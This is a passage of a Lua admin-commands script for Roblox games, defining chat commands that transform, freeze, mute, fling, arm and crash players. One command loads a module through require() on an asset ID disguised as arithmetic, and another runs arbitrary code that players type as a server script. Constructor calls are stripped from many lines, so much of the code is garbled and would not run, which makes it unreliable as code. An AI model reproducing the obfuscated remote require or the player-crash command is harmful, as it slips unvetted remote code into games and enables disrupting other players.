  2350. cape:WaitForChild('COLOUR').Value = colour or v.Character and v.Character:WaitForChild('Head').BrickColor
  2351. cape:WaitForChild('DECAL').Value = decal
  2352. cape.Parent = v.PlayerGui wait(.1) cape.Disabled = false
  2353. end
  2354. end)
  2355. end
  2356. end)
  2357. end, 1, '!cape;plr[;colour/keyword]')
  2359. addcommand('objection', 'OBJECTION!', true, false, function(speaker) -- No clue where I was goin with this honestly. XD
  2360. if speaker.Character and speaker.Character:FindFirstChild('Head') then
  2361. local hair = game:GetService('InsertService'):LoadAsset(23658117)
  2362. repeat wait() until #hair:GetChildren() ~= 0
  2363. local hair = hair:GetChildren()[1]
  2364. local mesh,hndl
  2365. repeat mesh = hair:FindFirstChild('Mesh', true) wait() until mesh mesh.TextureId = ''
  2366. repeat hndl = hair:FindFirstChild('Handle', true) wait() until hndl hndl.BrickColor =,0,0))
  2367. hair.Parent = speaker.Character
  2368. game:GetService('Chat'):Chat(speaker.Character.Head, 'OBJECTION!', 3)
  2369. local cornered ='Sound') cornered.SoundId = '' cornered.Parent = speaker.Character.Head wait(.1) cornered:Play()
  2370. wait(5)
  2371. if hair then hair:Destroy() end
  2372. if cornered then cornered:Stop() wait(.1) cornered:Destroy() end
  2373. end
  2374. end, 0, '!objection')
  2376. addcommand({'dog', 'dogify'}, 'Turns a player into a dog! :O', true, true, function(speaker, message) -- Mostly from Kohl's Admin Commands V2, I just did my own updates. ;)
  2377. local plrz = getplayer(speaker, message)
  2378. for i, v in next, plrz do
  2379. spawn(function()
  2380. if v.Character then
  2381. local torso = v.Character:FindFirstChild('Torso') or v.Character:FindFirstChild('UpperTorso')
  2382. if torso then
  2383. if v.Character:FindFirstChild("Shirt") then v.Character.Shirt.Parent = torso end
  2384. if v.Character:FindFirstChild("Pants") then v.Character.Pants.Parent = torso end
  2385. dogify(v.Character)
  2386. local new ="Seat", v.Character) new.Name = "FAKETORSO" new.formFactor = "Symmetric" new.TopSurface = 0 new.BottomSurface = 0 new.Size =,1,4) new.CFrame = torso.CFrame
  2387. local bf ="BodyForce", new) bf.force =,new:GetMass()*196.25,0)
  2388. local weld ="Weld", torso) weld.Part0 = torso weld.Part1 = new weld.C0 =,-.5,0)
  2389. for a, part in pairs(v.Character:GetChildren()) do if part:IsA("BasePart") then part.BrickColor ="Brown") if part.Name:match('Torso') then part.Transparency = 1 end elseif part:findFirstChild("NameTag") then part.Head.BrickColor ="Brown") end end
  2390. end
  2391. end
  2392. end)
  2393. end
  2394. end, 1, '!dog;plr')
  2396. addcommand({'undog', 'undogify'}, 'Turns a player back into a human-thing', true, true, function(speaker, message) -- Mostly from Kohl's Admin Commands V2, I just did my own updates. ;)
  2397. local plrz = getplayer(speaker, message)
  2398. for i, v in next, plrz do
  2399. spawn(function()
  2400. if v.Character then
  2401. local torso = v.Character:FindFirstChild('Torso') or v.Character:FindFirstChild('UpperTorso')
  2402. if torso then
  2403. if torso:FindFirstChild("Shirt") then torso.Shirt.Parent = v.Character end
  2404. if torso:FindFirstChild("Pants") then torso.Pants.Parent = v.Character end
  2405. normify(v.Character)
  2406. for a, part in pairs(v.Character:GetChildren()) do if part:IsA("BasePart") then part.BrickColor ="White") if part.Name:match('Torso') then part.Transparency = 0 end if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor ="White") end end
  2407. end
  2408. end
  2409. end)
  2410. end
  2411. end, 1, '!undog;plr')
  2413. addcommand('team', 'Sets a player on a specific team', false, true, function(speaker, message)
  2414. pcall(function()
  2415. local chk = message:find(split)
  2416. local plrz = getplayer(speaker, message:sub(1,chk-1))
  2417. for i, v in next, plrz do
  2418. for x, z in next, TeamsService:GetChildren() do
  2419. if z:IsA('Team') and z.Name:sub(1, #message:sub(chk+1)):lower() == message:sub(chk+1):lower() then
  2420. v.TeamColor = z.TeamColor
  2421. if v.Character and killplronteamswitch then v.Character:BreakJoints() end
  2422. break
  2423. end
  2424. end
  2425. end
  2426. end)
  2427. end, 1, '!team;plr;teamname')
  2429. addcommand('join', 'Sets the player who spoke on a specific team', false, true, function(speaker, message)
  2430. for x, z in next, TeamsService:GetChildren() do
  2431. if z:IsA('Team') and z.Name:sub(1, #message):lower() == message:lower() then
  2432. speaker.TeamColor = z.TeamColor
  2433. if speaker.Character and killplronteamswitch then speaker.Character:BreakJoints() end
  2434. break
  2435. end
  2436. end
  2437. end, teamjoinrank, '!join;teamname')
  2439. addcommand('punish', 'Punishes a player', false, true, function(speaker, message)
  2440. local plrz = getplayer(speaker, message)
  2441. for i, v in next, plrz do
  2442. if v.Character then
  2443. v.Character.Parent = ServerStorageService
  2444. v.Character:MakeJoints()
  2445. end
  2446. end
  2447. end, 2, '!punish;plr')
  2449. addcommand('unpunish', 'Punishes a player', false, true, function(speaker, message)
  2450. local plrz = getplayer(speaker, message)
  2451. for i, v in next, plrz do
  2452. if v.Character then
  2453. v.Character.Parent = WorkspaceService
  2454. v.Character:MakeJoints()
  2455. end
  2456. end
  2457. end, 2, '!unpunish;plr')
  2459. addcommand('ff', 'Gives a player a force field', false, true, function(speaker, message)
  2460. local plrz = getplayer(speaker, message)
  2461. for i, v in next, plrz do
  2462. if v.Character then
  2463. for x, z in next, v.Character:GetChildren() do if z:IsA('ForceField') then z:Destroy() end end
  2464.'ForceField',v.Character).Name = 'FF'
  2465. end
  2466. end
  2467. end, 1, '!ff;plr')
  2469. addcommand('unff', 'Takes away a player\'s force field', false, true, function(speaker, message)
  2470. local plrz = getplayer(speaker, message)
  2471. for i, v in next, plrz do
  2472. if v.Character then
  2473. for x, z in next, v.Character:GetChildren() do if z:IsA('ForceField') then z:Destroy() end end
  2474. end
  2475. end
  2476. end, 1, '!unff;plr')
  2478. addcommand('stun', 'Stuns a player', false, true, function(speaker, message)
  2479. local plrz = getplayer(speaker, message)
  2480. for i, v in next, plrz do
  2481. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2482. v.Character.Humanoid.PlatformStand = true
  2483. end
  2484. end
  2485. end, 2, '!stun;plr')
  2487. addcommand('unstun', 'Unstuns a player', false, true, function(speaker, message)
  2488. local plrz = getplayer(speaker, message)
  2489. for i, v in next, plrz do
  2490. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2491. v.Character.Humanoid.PlatformStand = false
  2492. end
  2493. end
  2494. end, 2, '!unstun;plr')
  2496. addcommand('jump', 'Makes a player jump', false, true, function(speaker, message)
  2497. local plrz = getplayer(speaker, message)
  2498. for i, v in next, plrz do
  2499. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2500. v.Character.Humanoid.Jump = true
  2501. end
  2502. end
  2503. end, 1, '!jump;plr')
  2505. addcommand('sit', 'Makes a player sit', false, true, function(speaker, message)
  2506. local plrz = getplayer(speaker, message)
  2507. for i, v in next, plrz do
  2508. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2509. v.Character.Humanoid.Sit = true
  2510. end
  2511. end
  2512. end, 1, '!sit;plr')
  2514. addcommand({'jp', 'jumppower'}, 'Changes a player\'s jump power [Max is 1,000]', false, true, function(speaker, message)
  2515. pcall(function()
  2516. local chk = message:find(split)
  2517. local plrz = getplayer(speaker, message:sub(1, chk-1))
  2518. for i, v in next, plrz do
  2519. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2520. v.Character.Humanoid.JumpPower = tonumber(message:sub(chk+1)) or 50 -- 50 is the default
  2521. end
  2522. end
  2523. end)
  2524. end, 1, '!jumppower;plr')
  2526. addcommand('respawn', 'Respawns a player\'s character', false, true, function(speaker, message) local plrz = getplayer(speaker, message) for i, v in next, plrz do v:LoadCharacter() end end, 2, '!respawn;plr')
  2528. addcommand('age', 'Sends a message with how long the player has been on Roblox', false, true, function(speaker, message)
  2529. local plrz = getplayer(speaker, message)
  2530. for i, v in next, plrz do
  2531. local yr = math.floor(v.AccountAge/365); local ds = math.floor(v.AccountAge%365)
  2532. createmessage({speaker}, 'User '..v.Name..' has been on Roblox for '..tostring(yr)..' years and '..tostring(ds)..' days', false, speaker.Name, false)
  2533. end
  2534. end, 1, '!age;plr')
  2536. addcommand({'gear', 'wep'}, 'Gives a player a gear', false, true, function(speaker, message)
  2537. pcall(function()
  2538. local chk = message:find(split)
  2539. local plrz = getplayer(speaker, message:sub(1, chk-1))
  2540. local num = tonumber(message:sub(chk+1)) or 0
  2541. local gear = game:GetService('InsertService'):LoadAsset(num)
  2542. wait(1)
  2543. if #gear:GetChildren() ~= 0 then
  2544. for i, v in next, plrz do
  2545. if v:FindFirstChild('Backpack') then
  2546. for x, z in next, gear:GetChildren() do
  2547. if z:IsA('Tool') then
  2548. z:Clone().Parent = v.Backpack
  2549. end
  2550. end
  2551. end
  2552. end
  2553. else
  2554. createmessage({speaker}, 'Item not found.\nPlease check if the item\'s id is correct or if it\'s available, then try again.', false, speaker.Name, false)
  2555. end
  2556. end)
  2557. end, 1, '!gear;plr;gearid')
  2559. addcommand({'hat', 'accessory'}, 'Gives a player a hat', false, true, function(speaker, message)
  2560. pcall(function()
  2561. local chk = message:find(split)
  2562. local plrz = getplayer(speaker, message:sub(1, chk-1))
  2563. local num = tonumber(message:sub(chk+1)) or 0
  2564. local hat = game:GetService('InsertService'):LoadAsset(num)
  2565. wait(1)
  2566. if #hat:GetChildren() ~= 0 then
  2567. for i, v in next, plrz do
  2568. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2569. for x, z in next, hat:GetChildren() do
  2570. if z:IsA('Hat') then z:Clone().Parent = v.Character
  2571. elseif z:IsA('Accessory') then local newaccessory = z:Clone() v.Character.Humanoid:AddAccessory(newaccessory)
  2572. end
  2573. end
  2574. end
  2575. end
  2576. else
  2577. createmessage({speaker}, 'Item not found.\nPlease check if the item\'s id is correct or if it\'s available, then try again.', false, speaker.Name, false)
  2578. end
  2579. end)
  2580. end, 1, '!hat;plr;hatid')
  2582. addcommand({'ins', 'insert'}, 'Inserts a model into the game', false, true, function(speaker, message)
  2583. pcall(function()
  2584. local num = tonumber(message) or 0
  2585. local asset = game:GetService('InsertService'):LoadAsset(num)
  2586. wait(.1)
  2587. if #asset:GetChildren() ~= 0 then
  2588. for i, v in next, asset:GetChildren() do
  2589. pcall(function()
  2590. local item = v:Clone() item.Parent = WorkspaceService item:MoveTo(speaker.Character:GetModelCFrame().p)
  2591. end)
  2592. end
  2593. else
  2594. createmessage({speaker}, 'Item not found.\nPlease check if the item\'s id is correct or if it\'s available, then try again.', false, speaker.Name, false)
  2595. end
  2596. end)
  2597. end, 1, '!ins;modelid')
  2599. addcommand('getscript', 'Prompts a player to buy the admin :D', false, false, function(speaker) pcall(function() MarketplaceService:PromptPurchase(speaker, math.ceil(106219.72603044*9001)) end) end, 0, '!getscript')
  2601. addcommand('button', 'A myerious, shiny button :o', true, false, function(speaker)
  2602. if speaker.Character and speaker.Character:FindFirstChild('Head') then
  2603. local red ='Part') red.BrickColor ='Really red') red.Anchored = false red.CanCollide = true red.Size =,.2,.8) red.Reflectance = .4
  2604. local base = red:Clone() base.BrickColor ='Dark stone grey') base.Size =,.2,1.2) base.Parent = red
  2605. local weld ='Weld') weld.Part0 = red weld.Part1 = base weld.C0 =,-.1,0) weld.Parent = base
  2606. local msh ='BlockMesh') msh.Scale =,1,1) msh.Parent = red base.CFrame = speaker.Character.Head.CFrame*,0,-3.5)
  2607. local sound ='Sound') sound.SoundId = '' sound.Parent = red
  2608. red.Parent = WorkspaceService game:GetService('Chat'):Chat(red, 'Press the button '..speaker.Name..'!', 3)
  2609. local con con = red.Touched:Connect(function(h)
  2610. if h and h.Parent and (h.Parent:FindFirstChild('Humanoid') and h.Parent == speaker.Character or h.Parent.Parent:FindFirstChild('Humanoid') or h.Parent.Parent == speaker.Character) then
  2611. pcall(function() con:Disconnect() end) con = nil
  2612. msh.Scale =,.5,1)
  2613. sound:Play()
  2614. game:GetService('Chat'):Chat(red, 'IMMA BLOW YOUR BUM!!! DAT WAS MY FACE! RAAAAAAAAAAAAHHHHHHHHHH', 2) -- Probably my funniest command yet XD
  2615. wait(2)
  2616. local exp ='Explosion') exp.Position = speaker.Character.Head.CFrame.p wait() exp.Parent = WorkspaceService
  2617. game:GetService('Debris'):AddItem(red, 2)
  2618. end
  2619. end)
  2620. wait(30)
  2621. if red and red.Parent == WorkspaceService then red:Destroy() end
  2622. end
  2623. end, 2, '!button')
  2625. addcommand({'lf', 'loopfling'}, 'Repeatedly loops flinging a player', true, true, function(speaker, message)
  2626. local plrz = getplayer(speaker, message)
  2627. for i, v in next, plrz do
  2628. local loopfling = scriptsfolder:FindFirstChild('Lf')
  2629. if loopfling then
  2630. local loopfling = loopfling:Clone()
  2631. if loopfling:FindFirstChild('PLR') then loopfling.PLR.Value = v.Name else local val ='StringValue') val.Name = 'PLR' val.Value = v.Name val.Parent = loopfling end
  2632. loopfling.Name = v.Name..':Fling' table.insert(createdscripts, loopfling) loopfling.Parent = ServerScriptService wait() loopfling.Disabled = false
  2633. end
  2634. end
  2635. end, 2, '!loopfling;plr')
  2637. addcommand({'unlf', 'unloopfling'}, 'Stops repeatedly loop flinging a player', false, true, function(speaker, message)
  2638. for i, v in next, createdscripts do
  2639. if v.Name:sub(1, #message):lower() == message:lower() and v.Name:lower():match(':fling') then
  2640. v.Disabled = true v:Destroy()
  2641. end
  2642. end
  2643. end, 2, '!unloopfling;plr')
  2645. addcommand('mute', 'Mutes a player, preventing them from chatting', false, true, function(speaker, message)
  2646. local plrz = getplayer(speaker, message)
  2647. for i, v in next, plrz do
  2648. spawn(function()
  2649. if v:FindFirstChild('PlayerGui') then
  2650. local mute = scriptsfolder:FindFirstChild('Mute')
  2651. if mute and chkadmin(v.UserId, false) < 1 then
  2652. local mute = mute:Clone()
  2653. if mute:FindFirstChild('Set') then mute.Set.Value = true else local val ='BoolValue') val.Name = 'Set' val.Value = true val.Parent = mute end
  2654. mute.Name = v.Name..':Mute' table.insert(createdscripts, mute) mute.Parent = v.PlayerGui wait() mute.Disabled = false game:GetService('Debris'):AddItem(mute, 1)
  2655. end
  2656. end
  2657. end)
  2658. end
  2659. end, 3, '!mute;plr')
  2661. addcommand('unmute', 'Unmutes a player, allowing them to chat', false, true, function(speaker, message)
  2662. local plrz = getplayer(speaker, message)
  2663. for i, v in next, plrz do
  2664. spawn(function()
  2665. if v:FindFirstChild('PlayerGui') then
  2666. local mute = scriptsfolder:FindFirstChild('Mute')
  2667. if mute then
  2668. local mute = mute:Clone()
  2669. if mute:FindFirstChild('Set') then mute.Set.Value = false else local val ='BoolValue') val.Name = 'Set' val.Value = false val.Parent = mute end
  2670. mute.Name = v.Name..':Mute' table.insert(createdscripts, mute) mute.Parent = v.PlayerGui wait() mute.Disabled = false game:GetService('Debris'):AddItem(mute, 1)
  2671. end
  2672. end
  2673. end)
  2674. end
  2675. end, 2, '!unmute;plr')
  2677. addcommand({'s', 'c'}, 'Creates a new, separate script', false, true, function(speaker, message)
  2678. local sb = scriptsfolder:FindFirstChild('ScriptBase')
  2679. if sb and output(speaker, message) then
  2680. local sb = sb:Clone() sb.Name = speaker.Name..':Code'
  2681. for i = 1, #message do local code ='IntValue') code.Name = tostring(i) code.Value = message:reverse():sub(i,i):byte() code.Parent = sb end
  2682. table.insert(createdscripts, sb) sb.Parent = ServerScriptService wait() sb.Disabled = false
  2683.'BoolValue', sb).Name = 'isSentByScript'
  2684. local sentbywho ='ObjectValue') sentbywho.Value = speaker sentbywho.Name = 'sentByWh0?' sentbywho.Parent = sb
  2685. end
  2686. end, 1, '!s;print(\'Hello World!\')')
  2688. addcommand('crash', 'Crashes a player', false, true, function(speaker, message)
  2689. local plrz = getplayer(speaker, message)
  2690. for i, v in next, plrz do
  2691. spawn(function()
  2692. local crash = scriptsfolder:FindFirstChild('Crash')
  2693. if crash and chkadmin(v.UserId, false) < 1 then
  2694. local crash = crash:Clone() crash.Parent = v wait() crash.Disabled = false
  2695. end
  2696. end)
  2697. end
  2698. end, 3, '!crash;plr')
  2700. addcommand('sword', 'Gives a player a sword', false, true, function(speaker, message)
  2701. local plrz = getplayer(speaker, message)
  2702. for i, v in next, plrz do
  2703. spawn(function()
  2704. if v:FindFirstChild('Backpack') then
  2705. local sword = scriptsfolder:FindFirstChild('Sword')
  2706. if sword then
  2707. local sword = sword:Clone() sword.Name = v.Name..':Sword' table.insert(createdscripts, sword) sword.Parent = v.Backpack wait() sword.Disabled = false
  2708. end
  2709. end
  2710. end)
  2711. end
  2712. end, 2, '!sword;plr')
  2714. addcommand('unsword', 'Takes away a player\'s sword', false, true, function(speaker, message)
  2715. local plrz = getplayer(speaker, message)
  2716. for i, v in next, plrz do
  2717. for x, z in next, createdscripts do if z.Name == v.Name..':Sword' then z.Disabled = true z:Destroy() end end
  2718. if v:FindFirstChild('Backpack') then
  2719. for x, z in next, v.Backpack:GetChildren() do
  2720. if z:IsA('Tool') and z.Name == 'Sword' then
  2721. z:Destroy()
  2722. end
  2723. end
  2724. end
  2725. if v.Character then
  2726. for x, z in next, v.Character:GetChildren() do
  2727. if z:IsA('Tool') and z.Name == 'Sword' then
  2728. z:Destroy()
  2729. end
  2730. end
  2731. end
  2732. end
  2733. end, 2, '!unsword;plr')
  2735. addcommand('lock', 'Locks a player\'s character', false, true, function(speaker, message)
  2736. local plrz = getplayer(speaker, message)
  2737. for i, v in next, plrz do
  2738. if v.Character then
  2739. for x, z in next, v.Character:GetChildren() do
  2740. if z:IsA('BasePart') then
  2741. z.Locked = true
  2742. end
  2743. end
  2744. end
  2745. end
  2746. end, 1, '!lock;plr')
  2748. addcommand('unlock', 'Unlocks a player\'s character', false, true, function(speaker, message)
  2749. local plrz = getplayer(speaker, message)
  2750. for i, v in next, plrz do
  2751. if v.Character then
  2752. for x, z in next, v.Character:GetChildren() do
  2753. if z:IsA('BasePart') then
  2754. z.Locked = false
  2755. end
  2756. end
  2757. end
  2758. end
  2759. end, 1, '!unlock;plr')
  2761. addcommand({'chkforcmd', 'checkforcommand'}, 'Checks if a command exists', false, true, function(speaker, message)
  2762. local closestmatch = ''
  2763. local foundcmd = false
  2764. for i, v in next, commands do
  2765. if type(v.Commands) == type({}) then
  2766. for x, z in next, v.Commands do
  2767. if z:lower() == message:lower() then
  2768. createmessage({speaker}, 'Command found\n['..unpack(v.Commands)..']', false, 'System', false)
  2769. foundcmd = true
  2770. break
  2771. elseif z:lower():match(message:lower()) then
  2772. closestmatch = z..', '..closestmatch
  2773. end
  2774. end
  2775. elseif type(v.Commands) == type('') then
  2776. if v.Commands:lower() == message:lower() then
  2777. createmessage({speaker}, 'Command found\n['..v.Commands..']', false, 'System', false)
  2778. foundcmd = true
  2779. break
  2780. elseif v.Commands:lower():match(message) then
  2781. closestmatch = v.Commands..', '..closestmatch
  2782. end
  2783. end
  2784. end
  2785. if not foundcmd then
  2786. if closestmatch ~= '' then createmessage({speaker}, 'No such command found.\nDid you mean ['..closestmatch:sub(1,#closestmatch-2)..']?', false, 'System', false)
  2787. else createmessage({speaker}, 'No such command found.\nTry searching the command again under a different keyword.', false, 'System', false)
  2788. end
  2789. end
  2790. end, 0, '!chkforcommand;[command]')
  2792. addcommand('name', 'Changes a player\'s in game name', true, true, function(speaker, message)
  2793. local chk = message:find(split)
  2794. local plrz = getplayer(speaker, message:sub(1, chk-1))
  2795. for i, v in next, plrz do
  2796. spawn(function()
  2797. if v.Character and v.Character:FindFirstChild('Head') then
  2798. for x, z in pairs(v.Character:GetChildren()) do if z:FindFirstChild('fakeHead') then v.Character.Head.Transparency = 0 z:Destroy() end end
  2799. local diffhead ='Model') diffhead.Name = message:sub(chk+1) diffhead.Parent = v.Character
  2800. local head = v.Character.Head:Clone() head.Parent = diffhead
  2801. local hum ='Humanoid') hum.Name = 'fakeHead' hum.MaxHealth = 100 hum.Health = 100 hum.Parent = diffhead
  2802. local weld ='Weld') weld.Part0 = head weld.Part1 = v.Character.Head weld.Parent = head
  2803. v.Character.Head.Transparency = 1
  2804. v.Character.Humanoid.HealthChanged:Connect(function() hum.Health = v.Character.Humanoid.Health/v.Character.Humanoid.MaxHealth*100 end)
  2805. end
  2806. end)
  2807. end
  2808. end, 1, '!name;plr;TheeDeathCaster')
  2810. addcommand({'unname', 'rname', 'revertname'}, 'Changes a player\'s in game name back to theirs', true, true, function(speaker, message)
  2811. local plrz = getplayer(speaker, message)
  2812. for i, v in next, plrz do
  2813. spawn(function()
  2814. if v.Character and v.Character:FindFirstChild('Head') then
  2815. for x, z in next, v.Character:GetChildren() do if z:FindFirstChild('fakeHead') then v.Character.Head.Transparency = 0 z:Destroy() end end
  2816. end
  2817. end)
  2818. end
  2819. end, 1, '!unname;plr')
  2821. addcommand({'rarms', 'removearms'}, 'Removes a player\'s arms', true, true, function(speaker, message)
  2822. local plrz = getplayer(speaker, message)
  2823. for i, v in next, plrz do
  2824. if v.Character then
  2825. for x, z in next, v.Character:GetChildren() do
  2826. if z:IsA('BasePart') and z.Name:match('Arm') then
  2827. z:Destroy()
  2828. end
  2829. end
  2830. end
  2831. end
  2832. end, 1, '!removearms;plr')
  2834. addcommand({'rlegs', 'removelegs'}, 'Removes a player\'s legs', true, true, function(speaker, message)
  2835. local plrz = getplayer(speaker, message)
  2836. for i, v in next, plrz do
  2837. if v.Character then
  2838. for x, z in next, v.Character:GetChildren() do
  2839. if z:IsA('BasePart') and z.Name:match('Leg') then
  2840. z:Destroy()
  2841. end
  2842. end
  2843. end
  2844. end
  2845. end, 1, '!removelegs;plr')
  2847. addcommand({'rhands', 'removehands'}, 'Removes a player\'s hands', true, true, function(speaker, message)
  2848. local plrz = getplayer(speaker, message)
  2849. for i, v in next, plrz do
  2850. if v.Character then
  2851. for x, z in next, v.Character:GetChildren() do
  2852. if z:IsA('BasePart') and z.Name:match('Hand') then
  2853. z:Destroy()
  2854. end
  2855. end
  2856. end
  2857. end
  2858. end, 1, '!removehands;plr')
  2860. addcommand({'rfeet', 'removefeet'}, 'Removes a player\'s feet', true, true, function(speaker, message)
  2861. local plrz = getplayer(speaker, message)
  2862. for i, v in next, plrz do
  2863. if v.Character then
  2864. for x, z in next, v.Character:GetChildren() do
  2865. if z:IsA('BasePart') and z.Name:match('Foot') then
  2866. z:Destroy()
  2867. end
  2868. end
  2869. end
  2870. end
  2871. end, 1, '!removefeet;plr')
  2873. addcommand({'rlimbs', 'removelimbs'}, 'Removes a player\'s arms and legs', true, true, function(speaker, message)
  2874. local plrz = getplayer(speaker, message)
  2875. for i, v in next, plrz do
  2876. if v.Character then
  2877. for x, z in next, v.Character:GetChildren() do
  2878. if z:IsA('BasePart') and (z.Name:match('Arm') or z.Name:find('Leg')) then
  2879. z:Destroy()
  2880. end
  2881. end
  2882. end
  2883. end
  2884. end, 1, '!removelimbs;plr')
  2886. addcommand('face', 'Changes a player\'s face', true, true, function(speaker, message)
  2887. local chk = message:find(split)
  2888. local plrz = getplayer(speaker, message:sub(1, chk-1))
  2889. local face = message:sub(chk+1)
  2890. if face:lower() == 'xd' then face = 405706156
  2891. elseif face:lower() == 'epic' then face = 42070872
  2892. end
  2893. for i, v in next, plrz do
  2894. if v.Character and v.Character:FindFirstChild('Head') and v.Character.Head:FindFirstchild('face') then
  2895. v.Character.Head.face.Texture = ''..(tonumber(face) or v.Character.Head.face.Texture)
  2896. end
  2897. end
  2898. end, 1, '!face;plr;id')
  2900. addcommand({'unsd', 'abortsd', 'abortshutdown', 'unshutdown'}, 'Cancels the shutdown process', false, false, function(speaker) stopshutdown = true createmessage(PlayersService:GetPlayers(), 'Shutdown Aborted', false, 'System', false) for i = 1, 10 do slock = false wait(1/19) end end, 4, '!unshutdown') -- Long story short: I accidently shut down a server I was in, so I made this to stop that that from happening again. XD
  2902. addcommand({'admin', 'admin', 'a'}, 'Gives a player the second-lowest admin rank', false, true, function(speaker, message)
  2903. local plrz = getplayer(speaker, message)
  2904. for i, v in next, plrz do
  2905. if chkadmin(v.UserId, false) < 2 then
  2906. table.insert(admins, v.Name)
  2907. createmessage({v}, 'You\'re an admin!', true, 'deathspeaker2008', false)
  2908. end
  2909. end
  2910. end, 3, '!admin;plr')
  2912. addcommand({'unadmin', 'una'}, 'Takes away a player\'s admin abilities', false, true, function(speaker, message)
  2913. for x = 1, #admins do
  2914. if admins[x]:sub(1, #message):lower() == message:lower() or message:lower() == 'all' then
  2915. table.remove(admins, x)
  2916. end
  2917. end
  2918. end, 3, '!unadmin;plr')
  2920. addcommand('freeze', 'Freezes a player in their tracks', false, true, function(speaker, message)
  2921. local plrz = getplayer(speaker, message)
  2922. for i, v in next, plrz do
  2923. if v.Character then
  2924. for x, z in next, v.Character:GetChildren() do
  2925. if z:IsA('BasePart') then z.Anchored = true
  2926. elseif z:IsA('Humanoid') then z:UnequipTools()
  2927. elseif z:FindFirstChild('Handle') and not z:IsA('Tool') then z.Handle.Anchored = true
  2928. end
  2929. end
  2930. end
  2931. end
  2932. end, 2, '!freeze;plr')
  2934. addcommand({'thaw', 'unfreeze'}, 'Freezes a player in their tracks', false, true, function(speaker, message)
  2935. local plrz = getplayer(speaker, message)
  2936. for i, v in next, plrz do
  2937. if v.Character then
  2938. for x, z in next, v.Character:GetChildren() do
  2939. if z:IsA('BasePart') then z.Anchored = false
  2940. elseif z:FindFirstChild('Handle') and not z:IsA('Tool') then z.Handle.Anchored = false
  2941. end
  2942. end
  2943. end
  2944. end
  2945. end, 1, '!thaw;plr')
  2947. addcommand('biggerhead', 'Makes a players head big', true, true, function(speaker, message)
  2948. local plrz = getplayer(speaker, message)
  2949. for i, v in next, plrz do
  2950. if v.Character then
  2951. bighead(v.Character)
  2952. end
  2953. end
  2954. end, 1, '!biggerhead;plr')
  2956. addcommand({'normhead', 'normalhead'}, 'Makes a players head big', false, true, function(speaker, message)
  2957. local plrz = getplayer(speaker, message)
  2958. for i, v in next, plrz do
  2959. if v.Character then
  2960. normhead(v.Character)
  2961. end
  2962. end
  2963. end, 1, '!normhead;plr')
  2965. addcommand('part', 'Creates a new part [Arguments go as X by Y by Z]', false, true, function(speaker, message)
  2966. pcall(function()
  2967. local chk1 = message:find(split)
  2968. local chk2 = message:sub(chk1+1):find(split) + chk1
  2969. local p ='Part')
  2970. p.Size =,chk1-1)),tonumber(message:sub(chk1+1,chk2-1)),tonumber(message:sub(chk2+1)))
  2971. if speaker.Character then
  2972. if speaker.Character:FindFirstChild('Head') then
  2973. p.CFrame =,tonumber(message:sub(chk1+1,chk2-1))/2,0)
  2974. else
  2975. p.CFrame = speaker.Character:GetModelCFrame(),tonumber(message:sub(chk1+1,chk2-1))/2,0)
  2976. end
  2977. end
  2978. table.insert(objs, p)
  2979. p.Parent = WorkspaceService
  2980. end)
  2981. end, 1, '!part;X;Y;Z')
  2983. addcommand('clearparts', 'Clears all parts created from the \'!part\' command', false, false, function(speaker, message) for i, v in next, objs do v:Destroy() end end, 1, '!clearparts')
  2985. addcommand({'nograv', 'nogravity'}, 'Decreases a player\'s gravity', true, true, function(speaker, message)
  2986. local plrz = getplayer(speaker, message)
  2987. for i, v in next, plrz do
  2988. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  2989. for x, z in next, v.Character.HumanoidRootPart:GetChildren() do if z:IsA('BodyForce') then z:Destroy() end end
  2990. local bf ='BodyForce')
  2991. for x, z in next, v.Character:GetChildren() do
  2992. if z:IsA('BasePart') then
  2993. bf.Force = bf.Force +,z:GetMass()*162.9)
  2994. elseif (z:IsA('Hat') or z:IsA('Accessory')) and z:FindFirstChild('Handle') then
  2995. bf.Force = bf.Force +,z.Handle:GetMass()*162.9)
  2996. end
  2997. end
  2998. bf.Parent = v.Character.HumanoidRootPart
  2999. end
  3000. end
  3001. end, 1, '!nograv;plr')
  3003. addcommand({'grav', 'gravity'}, 'Sets a player\'s gravity back to normal', false, true, function(speaker, message)
  3004. local plrz = getplayer(speaker, message)
  3005. for i, v in next, plrz do
  3006. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  3007. for x, z in next, v.Character.HumanoidRootPart:GetChildren() do if z:IsA('BodyForce') then z:Destroy() end end
  3008. end
  3009. end
  3010. end, 1, '!grav;plr')
  3012. addcommand({'setgrav', 'setgravity'}, 'Changes a player\'s gravity', true, true, function(speaker, message)
  3013. pcall(function()
  3014. local chk = message:find(split)
  3015. local plrz = getplayer(speaker, message:sub(1, chk-1))
  3016. local num = tonumber(message:sub(chk+1)) or 162.9
  3017. for i, v in next, plrz do
  3018. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  3019. for x, z in next, v.Character.HumanoidRootPart:GetChildren() do if z:IsA('BodyForce') then z:Destroy() end end
  3020. local bf ='BodyForce')
  3021. for x, z in next, v.Character:GetChildren() do
  3022. if z:IsA('BasePart') then
  3023. bf.Force = bf.Force +,z:GetMass()*num)
  3024. elseif (z:IsA('Hat') or z:IsA('Accessory')) and z:FindFirstChild('Handle') then
  3025. bf.Force = bf.Force +,z.Handle:GetMass()*num)
  3026. end
  3027. end
  3028. bf.Parent = v.Character.HumanoidRootPart
  3029. end
  3030. end
  3031. end)
  3032. end, 1, '!setgrav;plr;num')
  3034. addcommand({'btools', 'buildtools'}, 'Gives a player building tools', true, true, function(speaker, message)
  3035. local plrz = getplayer(speaker, message)
  3036. local buildtools = require(math.ceil(7841704.79*200)) --<Looks cooler in my opinion. :P
  3037. for i, v in next, plrz do
  3038. if v:FindFirstChild('Backpack') then
  3039. for x, z in next, buildtools do
  3040. if not v.Backpack:FindFirstChild(z.Name) then
  3041. z:Clone().Parent = v.Backpack
  3042. end
  3043. end
  3044. end
  3045. end
  3046. end, 1, '!btools;plr')
  3048. addcommand('rocket', 'Sends a player flying through the air with a rocket', true, true, function(speaker, message)
  3049. local plrz = getplayer(speaker, message)
  3050. for i, v in next, plrz do
  3051. spawn(function()
